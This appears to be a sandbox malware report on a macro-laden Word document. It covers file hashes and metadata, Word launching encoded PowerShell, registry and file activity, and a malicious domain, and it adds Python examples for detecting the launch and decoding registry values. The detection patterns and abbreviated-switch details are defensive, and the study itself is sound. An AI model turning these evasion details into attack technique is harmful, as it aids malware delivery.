General information

| Field | Value |
|---|---|
| File name | a088f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064 |
| Full analysis | https://app.any.run/tasks/8048917d-0e7e-4e37-b77f-dd4d0bc7a6d5 |
| Verdict | Malicious activity |
| Analysis date | July 11, 2019, 18:31:11 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: cpjbhtiycbv, Subject: jojxdlzfhywl, Comments: notvcbcbjdajgyxytmqabeqpac, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Thu Jul 4 04:22:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5 | 860C7E42621B4BDBC96E376848B3DB1B |
| SHA1 | 42E79D2120E84DF854DBA7549027D704471AF0A0 |
| SHA256 | A088F745242B8249917993945089BA36D426EE597D803B1824DC9B3D30E2C064 |
| SSDEEP | 1536:cajjRgtFxaJp9m+x5m+AeS6U47taYyXpMxS:jjjRgNa9m+RSSB1qpMxS |
File type identification

| Extension | File type | Match (%) |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
Document metadata

| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | - |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 1 |
| Paragraphs | 1 |
| Lines | 1 |
| Bytes | 22528 |
| Company | - |
| Manager | - |
| CodePage | Windows Cyrillic |
| Security | None |
| Characters | 1 |
| Words | - |
| Pages | 1 |
| ModifyDate | 2019:07:04 03:22:00 |
| CreateDate | 2018:04:25 21:21:00 |
| TotalEditTime | - |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | - |
| Template | Normal |
| Comments | notvcbcbjdajgyxytmqabeqpac |
| Keywords | - |
| Author | - |
| Subject | jojxdlzfhywl |
| Title | cpjbhtiycbv |
Processes

| PID | Process | Path | Parent process | User | Company | Integrity level | Description | Version | Exit code | Indicators |
|---|---|---|---|---|---|---|---|---|---|---|
| 3716 | WINWORD.EXE | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 | — | — |
| 3132 | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 | — |

Command lines:

PID 3716: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a088f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064.doc"

PID 3132: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco 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
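The process chain is the report's key finding: WINWORD.EXE (PID 3716, started from explorer.exe) spawns powershell.exe (PID 3132) with -Enco, which powershell.exe accepts as an abbreviation of -EncodedCommand, so the Base64 argument that follows is the payload. The document itself is almost empty (one character, zero words, random-letter Title, Subject and Comments), and WINWORD.EXE wrote VBE\MSForms.exd, a cache file Word creates when a VBA project referencing Microsoft Forms is loaded, so a macro is the likely launcher. The Python below is an added detection example, not ANY.RUN output and not anything taken from the sample: it runs over constructed Sysmon-style process-creation records that mirror the PIDs, images and parents in the table, with a constructed Base64 stand-in for the encoded command, which is not reproduced on this page. The event field names, the Office host list and the severity labels are assumptions.

```python
"""Process-creation detection for the WINWORD.EXE -> powershell.exe -Enco chain.

Added example for this report, not ANY.RUN output. The events below are
CONSTRUCTED to mirror the process table (PIDs, images and parents match the
report); the Base64 payload is a constructed stand-in, because the real
encoded command is not reproduced on this page.
"""
import base64

# Office hosts whose child PowerShell is almost never legitimate (starting list, extend as needed).
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand plus the
# documented short forms -e / -ec, so "-Enco" in the report is a full match.
ENCODED_SWITCHES = {"e", "ec"} | {"encodedcommand"[:n] for n in range(2, len("encodedcommand") + 1)}


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def split_cmdline(cmd):
    """Minimal Windows command-line tokenizer: whitespace separates, double quotes group."""
    tokens, cur, quoted = [], [], False
    for ch in cmd:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def decode_encoded_command(b64):
    """-EncodedCommand takes Base64 of UTF-16LE text; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(text):
    """Inverse of the above; used only to build the constructed sample events."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def analyze(event):
    """Return a finding dict for an encoded PowerShell launch, else None."""
    if basename(event["Image"]) not in PS_IMAGES:
        return None
    tokens = split_cmdline(event["CommandLine"])
    payload = None
    for i, tok in enumerate(tokens[1:], start=1):
        if tok[:1] in "-/" and tok[1:].lower() in ENCODED_SWITCHES and i + 1 < len(tokens):
            payload = tokens[i + 1]
            break
    if payload is None:
        return None
    parent = basename(event["ParentImage"])
    return {
        "pid": event["ProcessId"],
        "parent": parent,
        # Office parent plus encoded command is the maldoc pattern in the report.
        "severity": "high" if parent in OFFICE_HOSTS else "medium",
        "decoded": decode_encoded_command(payload),
    }


def run_detection(events):
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed Sysmon-style (Event ID 1) records; only the fields the logic reads.
SAMPLE_PAYLOAD = "Write-Output 'stand-in payload'"
EVENTS = [
    {"ProcessId": 3716, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sample.doc"'},
    {"ProcessId": 3132, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco ' + encode_command(SAMPLE_PAYLOAD)},
    {"ProcessId": 4001, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},  # benign control
    {"ProcessId": 4002, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -ec " + encode_command("Get-Date")},  # encoded, non-Office parent
]

if __name__ == "__main__":
    for finding in run_detection(EVENTS):
        print(finding)
```

The prefix table matters in practice: a rule that matches only the literal -EncodedCommand or -enc misses -Enco as seen here, and -e or -ec as seen elsewhere. Decoding the Base64 in the detector rather than at triage time also lets the rule key on the decoded text (downloaders, IEX, hidden-window switches) instead of on the opaque blob.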
Registry activity

| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 3716 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | qs$ | 71732400840E0000010000000000000000000000 |
| 3716 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off |
| 3716 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On |
| 3716 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | WORDFiles | 1324023838 |
| 3716 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1324023952 |
| 3716 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1324023953 |
| 3716 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | MTTT | 840E00009A2DFCD91638D50100000000 |
| 3716 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | jt$ | 6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 3716 | WINWORD.EXE | delete value | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | jt$ | 6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 3716 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
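Three of the registry values above are binary blobs that are easy to misread as persistence. Decoding them shows otherwise: qs$ and jt$ under Resiliency\StartupItems both start with their own name followed by the little-endian PID 3716 (0x0E84), and jt$ then carries a 16-bit character count (0x3E = 62) followed by the UTF-16LE path C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm; MTTT holds the same PID followed by a 64-bit FILETIME that decodes to 2019-07-11 18:31 UTC, the analysis time. Office uses the Resiliency key to track items it is loading so they can be disabled if they crash the application, and the jt$ entry is written and deleted within the run, so all of this is Word's own bookkeeping for the template it loaded in this session, not something the document wrote. The Python below is an added example, not ANY.RUN output: the hex strings are copied from the table, the PID and the path are checked against the report, and the field layout beyond those two (the length prefix, the PID plus FILETIME shape of MTTT) is an inference from these values.

```python
"""Decode the WINWORD.EXE Resiliency\\StartupItems and MTTT registry values.

Added example for this report, not ANY.RUN output. The three hex strings are
copied from the registry table. Verified against the report: the PID (3716)
in each value and the Normal.dotm path in jt$. Inferred, not documented: the
16-bit length prefix before the path and the PID + FILETIME layout of MTTT.
"""
import struct
from datetime import datetime, timedelta, timezone

QS_VALUE = "71732400840E0000010000000000000000000000"
JT_VALUE = "6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000"
MTTT_VALUE = "840E00009A2DFCD91638D50100000000"

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ticks):
    """Windows FILETIME is 100-nanosecond intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def extract_string(data, min_chars=8):
    """Find a UTF-16LE run of printable ASCII; prefer one whose preceding uint16 equals its length.

    Scanning every even offset keeps this independent of the header layout; the
    length-prefix preference stops it returning the run that starts one code unit
    early at the 0x3E count word, which happens to be printable ('>').
    """
    candidates = []
    for start in range(2, len(data) - 1, 2):
        end = start
        while end + 1 < len(data) and 0x20 <= (data[end] | data[end + 1] << 8) < 0x7F:
            end += 2
        n = (end - start) // 2
        if n >= min_chars:
            prefixed = struct.unpack_from("<H", data, start - 2)[0] == n
            candidates.append((prefixed, n, start, data[start:end].decode("utf-16-le")))
    if not candidates:
        return None
    prefixed, n, start, text = max(candidates)  # length-prefixed first, then longest
    return {"offset": start, "length_prefixed": prefixed, "text": text}


def decode_value(name, hex_value):
    """Decode one REG_BINARY value from the table into its recognisable fields."""
    data = bytes.fromhex(hex_value)
    out = {"name": name, "size": len(data)}
    if name == "MTTT":
        # Observed: uint32 PID, uint64 FILETIME, four zero bytes (layout inferred from this value).
        pid, filetime = struct.unpack_from("<IQ", data, 0)
        out.update(pid=pid, filetime=filetime_to_datetime(filetime))
        return out
    # StartupItems values: 4-byte tag equal to the value name, then uint32 PID.
    out["tag"] = data[:4].rstrip(b"\0").decode("ascii")
    out["pid"] = struct.unpack_from("<I", data, 4)[0]
    found = extract_string(data)
    if found:
        out["path"] = found["text"]
        out["length_prefixed"] = found["length_prefixed"]
    return out


if __name__ == "__main__":
    for name, value in (("qs$", QS_VALUE), ("jt$", JT_VALUE), ("MTTT", MTTT_VALUE)):
        print(decode_value(name, value))
```

The practical check is the PID: a value that embeds the PID of the process that wrote it is per-session state, not a persistence key, and the same decode applied to a Resiliency value from an unknown host quickly tells you which Office process and which template or add-in it refers to.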
Files created

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B51.tmp.cvr | — | — | — |
| 3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UUSED6Z8MWD0SDCLYFDP.temp | — | — | — |
| 3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 53C936F15BA0E898CA1BDCEB3AE9C5FB | D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 |
| 3716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 2B750E90A4B89E831E6358713AF21201 | 5882D6220148A5C0346CEF118FB2CC2F175422E3E7BDBF8AA0D90BD1856FAF22 |
| 3716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$88f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064.doc | pgc | EDCE3B19BF70A35DB3868891CB4C3750 | 91644194A40B9730CC2A4882E819D202372D625B8E650540278FE4B79BBCE860 |
| 3716 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 51DA5FE52031A97E3360B3BD197C6843 | 71A69D103A520831A9EAB13321EEEB6B2DA848479DE7A6DF34B4A63436E20611 |
| 3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16743a.TMP | binary | 53C936F15BA0E898CA1BDCEB3AE9C5FB | D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 |
Network activity (domains)

| Domain | IP | Reputation |
|---|---|---|
| hbartonkwiey.xyz | — | malicious |